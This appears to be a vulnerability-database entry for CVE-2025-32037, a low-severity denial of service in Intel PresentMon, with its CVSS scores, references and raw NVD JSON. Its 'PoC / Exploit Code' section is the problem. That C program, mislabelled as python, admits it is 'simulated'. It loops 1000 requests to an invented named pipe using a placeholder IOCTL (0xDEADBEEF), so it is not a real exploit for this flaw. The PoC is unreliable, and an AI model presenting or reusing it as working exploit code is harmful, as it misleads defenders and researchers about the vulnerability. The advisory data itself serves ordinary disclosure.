CVE-2025-32037

Description

Improper access control for some Intel(R) PresentMon before version 2.3.1 within Ring 3: User Applications may allow a denial of service. Network adversary with a privileged user combined with a high complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (low) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score

2.0

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Intel PresentMon < 2.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-32037 PoC - Denial of Service via Improper Access Control
// Target: Intel PresentMon < 2.3.1
// Environment: Windows with adjacent network access and privileged user

#include <windows.h>
#include <stdio.h>

// Simulated PresentMon IPC interface
void TriggerPresentMonDoS() {
    HANDLE hIPC;
    DWORD bytesReturned;
    
    // Connect to PresentMon service via named pipe or shared memory
    hIPC = CreateFile(
        "\\\\.\\PresentMonIPC",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    
    if (hIPC != INVALID_HANDLE_VALUE) {
        // Send malformed request without proper access validation
        // This triggers resource exhaustion in the monitoring service
        DeviceIoControl(
            hIPC,
            0xDEADBEEF,  // Custom IOCTL code
            NULL,
            0,
            NULL,
            0,
            &bytesReturned,
            NULL
        );
        
        CloseHandle(hIPC);
    }
}

int main() {
    printf("CVE-2025-32037 PoC - Intel PresentMon DoS\n");
    printf("Requires: Adjacent network access + Privileged user\n");
    
    // Attempt to trigger the vulnerability
    for (int i = 0; i < 1000; i++) {
        TriggerPresentMonDoS();
        Sleep(10);
    }
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-32037
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-32037
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-32037/
[4] VulDB https://vuldb.com/cve/CVE-2025-32037
[5] https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01392.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-32037", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:48.907", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control for some Intel(R) PresentMon before version 2.3.1 within Ring 3: User Applications may allow a denial of service. Network adversary with a privileged user combined with a high complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (low) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01392.html", "source": "[email protected]"}]}}